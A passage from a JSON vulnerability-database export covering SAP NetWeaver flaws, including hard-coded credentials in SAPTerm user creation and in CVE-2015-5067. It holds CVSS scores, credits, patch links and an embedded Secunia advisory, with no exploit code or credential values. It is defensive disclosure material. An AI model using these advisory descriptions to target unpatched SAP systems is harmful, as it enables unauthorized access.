"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Julius von dem Bussche",
"sources": [
{
"db": "BID",
"id": "48509"
},
{
"db": "CNNVD",
"id": "CNNVD-201107-044"
}
],
"trust": 0.9
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "eb3d9f4a-1f90-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
}
],
"cvssV3": [],
"severity": [
{
"author": "IVD",
"id": "eb3d9f4a-1f90-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "eb3d9f4a-1f90-11e6-abef-000c29c66e3d"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. There was an error running some reports to create an SAPTerm user with hard-coded user credentials by convincing the system administrator to run a report. SAP Netweaver is prone to a security-bypass vulnerability that can allow a user to create insecure SAPTerm user accounts. \nAttackers can exploit this issue to perform certain unauthorized actions. This may aid in further attacks. SAPTerm user. ----------------------------------------------------------------------\n\n\nFrost \u0026 Sullivan 2011 Report: Secunia Vulnerability Research\n\\\"Frost \u0026 Sullivan believes that Secunia continues to be a major player in the vulnerability research market due to its diversity of products that provide best-in-class coverage, quality, and usability.\\\" This is just one of the key factors that influenced Frost \u0026 Sullivan to select Secunia over other companies. \nRead the report here:\nhttp://secunia.com/products/corporate/vim/fs_request_2011/\n\n\n----------------------------------------------------------------------\n\nTITLE:\nSAP NetWeaver SAPTerm Hardcoded Credentials User Creation Weakness\n\nSECUNIA ADVISORY ID:\nSA45034\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/45034/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=45034\n\nRELEASE DATE:\n2011-06-30\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/45034/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/45034/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=45034\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nA weakness has been reported in SAP NetWeaver, which can be exploited\nby malicious users to manipulate certain data. \n\nThe weakness is reported in the following components:\n* SAP Basis versions 620 through 640. \n* SAP Basis versions 700 through 702. \n* SAP Basis versions 710 through 730. \n* SAP Basis versions 72L through 800. \n\nSOLUTION:\nApply fixes (please see the vendor\u0027s advisory for details). \n\nPROVIDED AND/OR DISCOVERED BY:\nThe vendor credits Julius von dem Bussche, Xiting AG. \n\nORIGINAL ADVISORY:\nSAP:\nhttps://service.sap.com/sap/support/notes/1542645\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-2507"
},
{
"db": "BID",
"id": "48509"
},
{
"db": "IVD",
"id": "eb3d9f4a-1f90-11e6-abef-000c29c66e3d"
},
{
"db": "PACKETSTORM",
"id": "102685"
}
],
"trust": 1.08
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "48509",
"trust": 1.5
},
{
"db": "CNVD",
"id": "CNVD-2011-2507",
"trust": 0.8
},
{
"db": "SECUNIA",
"id": "45034",
"trust": 0.7
},
{
"db": "CNNVD",
"id": "CNNVD-201107-044",
"trust": 0.6
},
{
"db": "IVD",
"id": "EB3D9F4A-1F90-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "102685",
"trust": 0.1
}
],
"sources": [
{
"db": "IVD",
"id": "eb3d9f4a-1f90-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-2507"
},
{
"db": "BID",
"id": "48509"
},
{
"db": "PACKETSTORM",
"id": "102685"
},
{
"db": "CNNVD",
"id": "CNNVD-201107-044"
}
]
},
"id": "VAR-190001-0018",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "eb3d9f4a-1f90-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-2507"
}
],
"trust": 1.06917922
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "eb3d9f4a-1f90-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-2507"
}
]
},
"last_update_date": "2022-05-17T22:52:22.076000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Netweaver Unsecure SAPTerm User Account Creates a Security Vulnerability Vulnerability Patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/4302"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-2507"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.7,
"url": "http://secunia.com/advisories/45034/"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/48509"
},
{
"trust": 0.4,
"url": "https://service.sap.com/sap/support/notes/1542645"
},
{
"trust": 0.3,
"url": "http://www.sap.com/platform/netweaver/index.epx"
},
{
"trust": 0.1,
"url": "http://secunia.com/products/corporate/vim/fs_request_2011/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/45034/#comments"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=45034"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-2507"
},
{
"db": "BID",
"id": "48509"
},
{
"db": "PACKETSTORM",
"id": "102685"
},
{
"db": "CNNVD",
"id": "CNNVD-201107-044"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "eb3d9f4a-1f90-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-2507"
},
{
"db": "BID",
"id": "48509"
},
{
"db": "PACKETSTORM",
"id": "102685"
},
{
"db": "CNNVD",
"id": "CNNVD-201107-044"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-07-01T00:00:00",
"db": "IVD",
"id": "eb3d9f4a-1f90-11e6-abef-000c29c66e3d"
},
{
"date": "2011-07-01T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-2507"
},
{
"date": "2011-06-30T00:00:00",
"db": "BID",
"id": "48509"
},
{
"date": "2011-06-30T03:34:23",
"db": "PACKETSTORM",
"id": "102685"
},
{
"date": "1900-01-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201107-044"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-07-01T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-2507"
},
{
"date": "2011-06-30T00:00:00",
"db": "BID",
"id": "48509"
},
{
"date": "2011-07-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201107-044"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201107-044"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Netweaver Unsafe SAPTerm User Account Creation Security Bypass Vulnerability",
"sources": [
{
"db": "IVD",
"id": "eb3d9f4a-1f90-11e6-abef-000c29c66e3d"
},
{
"db": "CNNVD",
"id": "CNNVD-201107-044"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201107-044"
}
],
"trust": 0.6
}
}
var-201506-0095
Vulnerability from variot
The (1) Cross-System Tools and (2) Data Transfer Workbench in SAP NetWeaver have hardcoded credentials, which allows remote attackers to obtain access via unspecified vectors, aka SAP Security Notes 2059659 and 2057982. Vendors have confirmed this vulnerability SAP Security Note 2059659 and 2057982 It is released as.Access may be obtained by a third party. SAP NetWeaver is prone to multiple local security-bypass vulnerabilities. Local attackers can exploit these issues to bypass certain security restrictions and perform unauthorized actions
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201506-0095",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": null,
"trust": 0.8,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "75165"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-003264"
},
{
"db": "NVD",
"id": "CVE-2015-5067"
},
{
"db": "CNNVD",
"id": "CNNVD-201506-501"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2015-5067"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Vahagn Vardanyan, Rustem Gazizov, and Diana Grigorieva of ERPScan.",
"sources": [
{
"db": "BID",
"id": "75165"
}
],
"trust": 0.3
},
"cve": "CVE-2015-5067",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2015-5067",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2015-5067",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201506-501",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-003264"
},
{
"db": "NVD",
"id": "CVE-2015-5067"
},
{
"db": "CNNVD",
"id": "CNNVD-201506-501"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The (1) Cross-System Tools and (2) Data Transfer Workbench in SAP NetWeaver have hardcoded credentials, which allows remote attackers to obtain access via unspecified vectors, aka SAP Security Notes 2059659 and 2057982. Vendors have confirmed this vulnerability SAP Security Note 2059659 and 2057982 It is released as.Access may be obtained by a third party. SAP NetWeaver is prone to multiple local security-bypass vulnerabilities. \nLocal attackers can exploit these issues to bypass certain security restrictions and perform unauthorized actions",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-5067"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-003264"
},
{
"db": "BID",
"id": "75165"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2015-5067",
"trust": 2.7
},
{
"db": "BID",
"id": "75165",
"trust": 1.3
},
{
"db": "PACKETSTORM",
"id": "133515",
"trust": 1.0
},
{
"db": "PACKETSTORM",
"id": "133516",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2015-003264",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201506-501",
"trust": 0.6
}
],
"sources": [
{
"db": "BID",
"id": "75165"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-003264"
},
{
"db": "NVD",
"id": "CVE-2015-5067"
},
{
"db": "CNNVD",
"id": "CNNVD-201506-501"
}
]
},
"id": "VAR-201506-0095",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:03:26.630000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Note 2059659,2057982",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-55451"
},
{
"title": "SAP Security Notes June 2015",
"trust": 0.8,
"url": "http://scn.sap.com/community/security/blog/2015/06/11/sap-security-notes-june-2015"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-003264"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-255",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-003264"
},
{
"db": "NVD",
"id": "CVE-2015-5067"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "http://scn.sap.com/community/security/blog/2015/06/11/sap-security-notes-june-2015"
},
{
"trust": 1.4,
"url": "http://erpscan.com/advisories/erpscan-15-016-sap-netweaver-hardcoded-credentials/"
},
{
"trust": 1.0,
"url": "http://packetstormsecurity.com/files/133515/sap-netweaver-as-fkcdbftrace-abap-hardcoded-credentials.html"
},
{
"trust": 1.0,
"url": "http://packetstormsecurity.com/files/133516/sap-netweaver-as-lsct1i13-abap-hardcoded-credentials.html"
},
{
"trust": 1.0,
"url": "http://www.securityfocus.com/bid/75165"
},
{
"trust": 1.0,
"url": "https://erpscan.io/advisories/erpscan-15-015-sap-netweaver-hardcoded-credentials/"
},
{
"trust": 1.0,
"url": "https://erpscan.io/advisories/erpscan-15-016-sap-netweaver-hardcoded-credentials/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-5067"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-5067"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-003264"
},
{
"db": "NVD",
"id": "CVE-2015-5067"
},
{
"db": "CNNVD",
"id": "CNNVD-201506-501"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "75165"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-003264"
},
{
"db": "NVD",
"id": "CVE-2015-5067"
},
{
"db": "CNNVD",
"id": "CNNVD-201506-501"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-06-11T00:00:00",
"db": "BID",
"id": "75165"
},
{
"date": "2015-06-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-003264"
},
{
"date": "2015-06-24T14:59:09.033000",
"db": "NVD",
"id": "CVE-2015-5067"
},
{
"date": "2015-06-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201506-501"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-07-15T01:00:00",
"db": "BID",
"id": "75165"
},
{
"date": "2015-10-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-003264"
},
{
"date": "2018-12-10T19:29:11.343000",
"db": "NVD",
"id": "CVE-2015-5067"
},
{
"date": "2015-06-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201506-501"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201506-501"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver of Cross-System Tools and Data Transfer Workbench Vulnerabilities that gain access",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-003264"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "trust management",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201506-501"
}
],
"trust": 0.6
}
}
var-201302-0415
Vulnerability from variot
SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. The SAP SMD agent provides an interface for listening to and processing the P4 protocol. It is a proprietary SAP protocol that allows you to obtain some version and configuration information for configuring installed programs and installing/removing applications
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201302-0415",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.x"
},
{
"model": "ccms agent",
"scope": null,
"trust": 0.6,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.2,
"vendor": "sap",
"version": "7.x*"
},
{
"model": "ccms agent null",
"scope": "eq",
"trust": 0.2,
"vendor": "sap",
"version": "*"
}
],
"sources": [
{
"db": "IVD",
"id": "fd741566-1f33-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-01362"
}
]
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "fd741566-1f33-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
}
],
"cvssV3": [],
"severity": [
{
"author": "IVD",
"id": "fd741566-1f33-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "fd741566-1f33-11e6-abef-000c29c66e3d"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
